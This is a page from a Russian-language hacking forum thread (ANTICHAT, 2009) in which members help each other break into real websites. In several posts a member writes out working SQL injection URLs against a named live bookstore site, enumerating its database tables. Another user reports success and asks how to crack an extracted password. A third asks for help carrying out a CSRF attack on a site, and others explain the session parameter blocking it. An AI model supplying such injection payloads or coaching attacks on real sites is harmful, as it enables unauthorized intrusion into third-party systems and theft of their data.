ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4851  
Старый 21.01.2009, 21:05
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от pinky07  
это поле password, а остальные поля login, email выводятся с нормальной кодировкой, кодировку я менял всеровно ничего не получается // это полюбому не в Хексе.
P.s щас попробую сам зарегаться и вывести свой пароль в этих кракозябрах=)))
Кодировка сдесь не причём, гораздо важнее какая база .

В Access такое бывает, какой-то алгоритм хеширования пароля

Если мускул , то или aes_encrypt(скорее всего), или самопис какой-то, по одному значению непонятно. С этим ты ничего не поделаешь, если только ключ угадаешь
 
Ответить с цитированием

  #4852  
Старый 21.01.2009, 21:07
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

Цитата:
Сообщение от TELO  
А что это? При запросе version() выдаёт следуюшее
PostgreSQL 7.4.23 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)

database(),user() не проходят
скуль
Код:
http://www.bookzone.com.ua/catalog.php?cid=-11028 UNION SELECT version()
Так в чем проблема-то?

Код:
http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+table_name+from+INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+0--
 
Ответить с цитированием

  #4853  
Старый 22.01.2009, 00:53
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами: 9107354

Репутация: 122
По умолчанию

Цитата:
Сообщение от R1dex  
Так в чем проблема-то?

Код:
http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+table_name+from+INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+0--
спасибо,нашол таблу. я просто не понял что за версия такая
 
Ответить с цитированием

  #4854  
Старый 22.01.2009, 01:10
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами: 9107354

Репутация: 122
По умолчанию

а скажите плиз,как перевести такой пасс ********
 
Ответить с цитированием

  #4855  
Старый 22.01.2009, 01:36
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

TELO в этой таблице нет пассов
http://www.postgresql.org/docs/7.4/static/view-pg-user.html
Ищи другую
 
Ответить с цитированием

  #4856  
Старый 22.01.2009, 01:36
RekRut
Участник форума
Регистрация: 27.02.2006
Сообщений: 261
С нами: 10632546

Репутация: 71
По умолчанию

Цитата:
а скажите плиз,как перевести такой пасс ********
мы под твоии звездами нифига не видим, если ты имеешь ввиду как вытащить пароль с под звезд есть спецом проги для етого в гугле пиши типо "стащить пароль из под звездочек"
 
Ответить с цитированием

  #4857  
Старый 22.01.2009, 01:41
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

Цитата:
Сообщение от RekRut  
мы под твоии звездами нифига не видим, если ты имеешь ввиду как вытащить пароль с под звезд есть спецом проги для етого в гугле пиши типо "стащить пароль из под звездочек"
Жжешь ))
Сори за оффтоп - не удержался ^^
 
Ответить с цитированием

  #4858  
Старый 22.01.2009, 02:05
Qam
Познающий
Регистрация: 16.01.2009
Сообщений: 40
С нами: 9114128

Репутация: 15
По умолчанию

Как по вашему мнению за что может отвечать переменая сид в урл такого вида posting.php?mode=delete&p=40&sid=790c50da612628e41 f4f900a830920c5
Я понимаю может этот вопрос выглядил глупо,просто я пытаюсь осуществить на сайт атаку CSRF!Мне кажется эта переменая мне и мешает пишет мол ошибка сесии!Сильно не ругайте!
 
Ответить с цитированием

  #4859  
Старый 22.01.2009, 02:19
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

За идентификацию сессии и отвечает
 
Ответить с цитированием

  #4860  
Старый 22.01.2009, 02:21
Артем Солнце
Banned
Регистрация: 19.01.2009
Сообщений: 26
С нами: 9109766

Репутация: 67
По умолчанию

Скачай двиг и посмотри исходники, а если по сабжу то sid - session id

Последний раз редактировалось Артем Солнце; 22.01.2009 в 02:23..
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.